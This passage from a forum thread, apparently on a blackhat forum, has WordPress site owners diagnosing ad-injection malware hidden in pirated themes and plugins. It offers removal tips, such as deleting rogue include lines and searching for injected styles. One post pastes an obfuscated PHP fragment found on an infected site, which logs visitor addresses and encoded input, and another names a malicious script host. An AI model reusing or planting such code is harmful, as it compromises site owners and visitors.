| Search (advanced search) | ||||
Use this Search form before posting, asking or make a new thread.
|
|
03-20-2014, 05:20 PM
Post: #41
|
|||
|
|||
|
RE: Have the same problem
I have the same problem with my website. Was not able to find any solution, but I found something weird.
A file called post.php with this in it: 0) print "\x53T\x41TUS\x2d\x49\x4dP\x4f\x52T-\x4fK"; if (strlen($input) > 10) { $fp = @fopen(str_replace("\x2ep\x68\x70",".\x62\x69\x6e",basename($_SERVER["SC\x52\x49P\x54_FIL\x45\x4eAM\x45"])), "a"); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER["\x52\x45\x4dOTE\x5f\x41DDR"]."\t".base64_encode($input)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } elseif (strpos($_SERVER["\x52\x45Q\x55\x45\x53T\x5f\x55R\x49"], "\x2es\x68\x74\x6dl") !== false) { print $_SERVER["\x52\x45Q\x55\x45\x53T\x5f\x55R\x49"]; } exit; ?> Could it be related? I deleted the file multiple times and it keeps re-appearing. |
|||
|
03-20-2014, 06:08 PM
(This post was last modified: 03-20-2014 06:14 PM by bale.)
Post: #42
|
|||
|
|||
RE:
(03-20-2014 02:23 PM)sreekuttan.dev@gmail.com Wrote: I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from open functions.php and remove this line: include 'inc/settings_class.php'; also remove the file at that location. The jerk doing this uses an include function to the infected file. Its pretty easy to spot since its at the very top of functions.php or in the case of mymail plugin include 'classes/wc.class.php'; right at the top of mymail.php |
|||
|
03-20-2014, 06:12 PM
(This post was last modified: 03-20-2014 06:15 PM by adwatch.)
Post: #43
|
|||
|
|||
RE:
(03-20-2014 03:19 PM)r1ckd33zy Wrote:Haha We are a fairly new company and want to keep our name clean. We figure if we work with publishers whether it be blackhat or whitehat we can work together. Plus we have some really good fraud checks which none of our competitors have.(03-20-2014 11:56 AM)adwatch Wrote: Hello to everyone at bestblackhatforum, my name is James and I am head of technical support over at adwat.chThis is a most amazing act of 'customer support' i have seen in a while. Who would have thought that someone for adwat.ch would be involved in supporting members of a 'blackhat' forum... (03-20-2014 03:43 PM)imxa Wrote:You don't need to PM your website if your worried. You're welcome to contact us here: http://adwat.ch/contact.php(03-20-2014 03:19 PM)r1ckd33zy Wrote:(03-20-2014 11:56 AM)adwatch Wrote: Hello to everyone at bestblackhatforum, my name is James and I am head of technical support over at adwat.chThis is a most amazing act of 'customer support' i have seen in a while. Who would have thought that someone for adwat.ch would be involved in supporting members of a 'blackhat' forum... |
|||
|
03-20-2014, 07:17 PM
Post: #44
|
|||
|
|||
RE:
(03-20-2014 06:08 PM)bale Wrote:Where is this file ''functions.php'' located as I can't find it in my blog location?(03-20-2014 02:23 PM)sreekuttan.dev@gmail.com Wrote: I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from |
|||
|
03-20-2014, 08:32 PM
Post: #45
|
|||
|
|||
|
RE:
Follow these steps
Login to you wp-admin and then go to your site click view source now ctrl+f and search body {visibility:hidden;} this code confirms adwatch is inserted in your theme or plugins. this code is implemented before</head> tag if you access on same browser where you login as admin you will find this source code on your home page <style> body {visibility:hidden;}</style> now go to exploit-scanner plugin then chek that Search for suspicious styles option click start scan after some time it will reload now again ctrl+f search " body {visibility:hidden;} and check which file is affected and then uninstall that theme or plugin or delete that code on that file  |
|||
|
03-20-2014, 10:38 PM
Post: #46
|
|||
|
|||
|
RE:
Yes this happened to me a few years ago. I downloaded a theme and installed it, then I began getting the message this site has been hacked. I removed the theme, deleted the sub-domain it was under. Then I checked each .js file and looked for the word "var" and sure enough I found a re-direct link.
Not every var text is bad just look for things like: var adwatch var iframe var exclude var adwatch _advert and so on... Good hunting. |
|||
|
03-21-2014, 12:14 AM
Post: #47
|
|||
|
|||
|
RE:
Hi already try to search adwat on all source files of wordpress and nothing is found. The strange thing is that this is still hapenning after i bought the theme replace all files and the problem still happens. I´m suspecting that the malware must be on the database or on other place than the theme files.
But i cant find it anyware. |
|||
|
03-21-2014, 07:19 AM
Post: #48
|
|||
|
|||
RE:
(03-20-2014 06:08 PM)bale Wrote:Go for this solution its worked....(03-20-2014 02:23 PM)sreekuttan.dev@gmail.com Wrote: I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from |
|||
|
03-21-2014, 08:15 AM
Post: #49
|
|||
|
|||
|
RE:
Thanks to adwatch, the adds until now are gone, but i cant find the find the script yet, the recomendations
"bale Wrote: (Today 04:23 AM)sreekuttan.dev@gmail.com Wrote: I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from Code: http://www4.zippyshare.com/v/25614833/file.html and causing redirect at random time intervals from all my links on website. open functions.php and remove this line: include 'inc/settings_class.php'; also remove the file at that location. The jerk doing this uses an include function to the infected file. Its pretty easy to spot since its at the very top of functions.php or in the case of mymail plugin include 'classes/wc.class.php'; right at the top of mymail.php Go for this solution its worked.... Read more @ bestblackhatforum.com : Beware before downloading wordpress themes and plugins [adwatch] http://bestblackhatforum.com/Thread-Bewa...z2wXm8El5K bestblackhatforum.com " Didnt work for me because i dont have that string in my functions file, but thanks anyway |
|||
|
03-21-2014, 10:52 AM
Post: #50
|
|||
|
|||
|
RE:
I'd like to thank everyone for sharing their contributions to this thread b/c I also ran across this problem w/ a plugin that I installed (EventON).
After spending countless hours going over every line of code with a colleague, it finally dawned on me to look @ the code that "bale" suggested was the problem. My file was hidden away in "classes/class-settings.php" and called by include 'classes/class-settings.php'; in my eventon.php file. The key is to do a search (I used the Multi-File Search in TextWrangler of my entire site --- downloaded locally to my machine) for the following string: spamcheckr The "infected" file (class-settings.php) has a ton of commented out lines of code, but it really only does one thing which is to pull the URL "http://spamcheckr.com/l.php". Just bringing that URL up in your browser will show a blank page. But if you view the source, you will see the following code: Code: <script type="text/javascript">As "bale" suggested, just delete the include from your file and delete that class-settings.php and you should be good to go. Hope this helps.  |
|||
